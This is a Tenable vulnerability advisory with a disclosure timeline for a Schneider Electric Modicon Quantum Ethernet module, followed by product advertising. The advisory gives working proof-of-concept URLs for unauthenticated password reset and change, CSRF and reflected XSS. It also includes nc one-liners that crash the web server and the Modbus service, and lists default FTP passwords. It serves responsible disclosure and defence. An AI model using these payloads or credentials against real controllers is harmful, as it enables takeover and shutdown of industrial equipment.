Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Multiple Schneider Electric Modicon Quantum Vulnerabilities

Critical

Synopsis

Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.

CVE-2018-7809: Unauthenticated Password Reset

An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:

http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password

This also has the side affect of resetting the web server username and password to the default USER/USER.

CVE-2018-7810: Reflected XSS

A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert Javascript into the name parameter that will be executed in the context of the person who followed the link. An example follows:

http://[ip]/goform/formTest?name=<script>alert()</script>

CVE-2018-7811: Unauthenticated Password Change

The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change user's passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:

http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

CVE-2018-7830: Unauthenticated Remote Denial of Service

A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This will render the web server useless for ~1 minute The following is a one line proof of concept:

echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80

CVE-2018-7831: Cross-site request forgery

The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:

http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

Others

Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated one of our vulnerabilities (default accounts) was a duplicate and the other (modbus denial of service) was not a vulnerability. However, we've decided to document them here.

Default FTP Accounts

We found a handful of default FTP accounts. Some passwords we used required use of a VxHash collision disclosed by H.D. Moore in 2010.

UsernamePassword
sysdiag[email protected]
fdruserssresurdf
fwupgradeFaAmU5p2F~
lokiZfTljublsx
Modbus Denial of Service

Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shutdown the Ethernet module:

echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502

Solution

No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."

Disclosure Timeline

08/26/2018 - 7 Issues Discovered
08/27/2018 - Schneider Electric informed by encrypted email. 90 day date is November 26, 2018.
08/30/2018 - Schneider informs Tenable that the disclosure has been forwarded internally. Schneider provides a new point of contact.
09/04/2018 - Tenable asks the new contact if they received the forwarded email.
09/07/2018 - Schneider confirms receipt and indicates the team is still assessing the disclosure.
09/20/2018 - Tenable asks for an update.
09/20/2018 - Schneider has no update yet.
09/26/2018 - Tenable asks for an update.
09/26/2018 - Schneider has no update yet.
09/28/2018 - Schneider confirms all vulnerabilities. However, the team hasn't confirmed if any of the vulnerabilities are duplicates yet.
10/12/2018 - Tenable asks for an update. Remind Schneider that 45 days remain.
10/12/2018 - Schneider indicates they'll know more soon.
10/23/2018 - Tenable asks for an update.
10/24/2018 - Schneider confirms 5 new vulnerabilities. Flags one as a duplicate and one as not impacted.
10/24/2018 - Tenable asks Schneider to assign CVE.
10/24/2018 - Schneider acknowledges.
11/19/2018 - Tenable reminds Schneider of the upcoming disclosure date.
11/20/2018 - Schnieder indicates they'll have the bulletin for Tenable to review shortly.
11/21/2018 - Schnieder provides 5 CVE.
11/23/2018 - Schneider releases their advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now and run your first scan within 60 seconds.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,190.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now and run your first scan within 60 seconds.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security